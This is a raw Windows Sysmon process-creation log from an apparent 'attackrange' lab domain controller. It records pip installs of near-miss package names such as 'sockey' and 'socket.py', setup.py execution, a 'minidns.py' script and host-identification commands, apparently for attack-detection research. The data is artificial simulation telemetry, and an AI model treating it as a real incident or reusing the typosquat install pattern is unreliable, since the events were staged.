"C:\Python27\Scripts\pip2.exe" install socket.py 154100x800000000000000065042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:06.883{A8622C2F-578A-6078-AA0D-00000000AE01}4420C:\Python27\python.exe-----c:\python27\python.exe -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-hhhogx\\socket.py\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" egg_info --egg-base pip-egg-infoc:\users\admini~1\appdata\local\temp\2\pip-install-hhhogx\socket.py\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socket.py 154100x800000000000000065026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:05.642{A8622C2F-5789-6078-A90D-00000000AE01}3264C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socket.pyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5789-6078-A80D-00000000AE01}5872C:\Python27\Scripts\pip2.exepip2 install socket.py 154100x800000000000000065018Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:11:05.633{A8622C2F-5789-6078-A80D-00000000AE01}5872C:\Python27\Scripts\pip2.exe-----pip2 install 
socket.pyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064901Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.555{A8622C2F-5771-6078-A70D-00000000AE01}4860C:\cygwin64\bin\cut.exe-----cut -d ' ' -f1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=487E5A2213745CFA36F8F16C359277EF,SHA256=DCD6B25EB6108D6A9AE5611E76894A1BA96D4EEA1988DBFFC777385FE52FB057,IMPHASH=3B690E684E157EE43866F8ADD488640B{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000064894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.553{A8622C2F-5771-6078-A60D-00000000AE01}1156C:\cygwin64\bin\hostname.exe-----hostname -I C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' -f1" 154100x800000000000000064886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.547{A8622C2F-5771-6078-A50D-00000000AE01}2044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "hostname -I | cut -d ' ' 
-f1"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5771-6078-A40D-00000000AE01}6160C:\Python27\python.exeC:\Python27\python.exe minidns.py 154100x800000000000000064878Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.503{A8622C2F-5771-6078-A40D-00000000AE01}6160C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5771-6078-A30D-00000000AE01}6336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:41.492{A8622C2F-5771-6078-A30D-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064810Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:28.335{A8622C2F-5764-6078-A20D-00000000AE01}6672C:\Python27\python.exe-----C:\Python27\python.exe minidns.pyC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5764-6078-A10D-00000000AE01}6460C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 
154100x800000000000000064791Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:28.320{A8622C2F-5764-6078-A10D-00000000AE01}6460C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064763Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:22.510{A8622C2F-575E-6078-A00D-00000000AE01}2044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:20.538{A8622C2F-575C-6078-9F0D-00000000AE01}5392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.865{A8622C2F-575B-6078-9E0D-00000000AE01}3736C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.287{A8622C2F-575B-6078-9D0D-00000000AE01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:19.031{A8622C2F-575B-6078-9C0D-00000000AE01}1348C:\Python27\python.exe-----c:\python27\python.exe -u -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py';f=getattr(tokenize, 'open', 
open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record c:\users\admini~1\appdata\local\temp\2\pip-record-ekox1z\install-record.txt --single-version-externally-managed --compilec:\users\admini~1\appdata\local\temp\2\pip-install-lo1d1l\sockets\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockets 154100x800000000000000064654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:18.725{A8622C2F-575A-6078-9B0D-00000000AE01}5928C:\Python27\python.exe-----c:\python27\python.exe -c "import sys, setuptools, tokenize; sys.argv[0] = 'c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py'; __file__='c:\\users\\admini~1\\appdata\\local\\temp\\2\\pip-install-lo1d1l\\sockets\\setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" egg_info --egg-base pip-egg-infoc:\users\admini~1\appdata\local\temp\2\pip-install-lo1d1l\sockets\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockets 154100x800000000000000064639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.780{A8622C2F-5759-6078-9A0D-00000000AE01}3868C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install 
socketsC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-5759-6078-990D-00000000AE01}4384C:\Python27\Scripts\pip2.exepip2 install sockets 154100x800000000000000064631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.771{A8622C2F-5759-6078-990D-00000000AE01}4384C:\Python27\Scripts\pip2.exe-----pip2 install socketsC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064623Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:17.629{A8622C2F-5759-6078-980D-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:16.962{A8622C2F-5758-6078-970D-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064601Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:10:16.296{A8622C2F-5758-6078-960D-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:49.958{A8622C2F-573D-6078-950D-00000000AE01}1100C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install socketC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-573D-6078-940D-00000000AE01}6736C:\Python27\Scripts\pip2.exepip2 install socket 154100x800000000000000064470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:09:49.950{A8622C2F-573D-6078-940D-00000000AE01}6736C:\Python27\Scripts\pip2.exe-----pip2 install socketC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064452Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:47.240{A8622C2F-573B-6078-930D-00000000AE01}4604C:\Python27\python.exe-----"c:\python27\python.exe" "C:\Python27\Scripts\pip2.exe" install sockeyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9767F3103C55C66CC2C9EB39D56DB594,SHA256=9856AEB5A4CFCD3E768AE183CBB330BFDCF1A2FE4C9634BB1A59BA53047F43A4,IMPHASH=B9C8083416BFD3E8EBE08EE049CE740B{A8622C2F-573B-6078-920D-00000000AE01}6552C:\Python27\Scripts\pip2.exepip2 install sockey 154100x800000000000000064444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:47.227{A8622C2F-573B-6078-920D-00000000AE01}6552C:\Python27\Scripts\pip2.exe-----pip2 install sockeyC:\Python27\Scripts\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B84C0D8A63437424F8A09F762743B20,SHA256=E394091F86CB552B70CB59583A3D5C3175EC501367613846DBCA5F3FEA03358C,IMPHASH=EDA8A5B05CE5C31D8A53AE4F8374ED88{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Python27\Scripts" 154100x800000000000000064410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:41.835{A8622C2F-5735-6078-900D-00000000AE01}2272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd 
"C:\Python27\Scripts"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000064334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:25.905{A8622C2F-5725-6078-8F0D-00000000AE01}3148C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:22.508{A8622C2F-5722-6078-8E0D-00000000AE01}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.555{A8622C2F-5720-6078-8D0D-00000000AE01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000064277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.060{A8622C2F-5720-6078-8C0D-00000000AE01}6440C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-5720-6078-8B0D-00000000AE01}648C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.051{A8622C2F-5720-6078-8B0D-00000000AE01}648C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5720-6078-8A0D-00000000AE01}6336C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:09:20.043{A8622C2F-5720-6078-8A0D-00000000AE01}6336C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.026{A8622C2F-5720-6078-890D-00000000AE01}5928C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-5720-6078-880D-00000000AE01}3916C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:20.017{A8622C2F-5720-6078-880D-00000000AE01}3916C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5720-6078-870D-00000000AE01}3008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064223Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:09:20.008{A8622C2F-5720-6078-870D-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-830D-00000000AE01}6836C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.994{A8622C2F-571F-6078-860D-00000000AE01}6444C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-571F-6078-850D-00000000AE01}7016C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:09:19.986{A8622C2F-571F-6078-850D-00000000AE01}7016C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-571F-6078-840D-00000000AE01}5332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000064190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
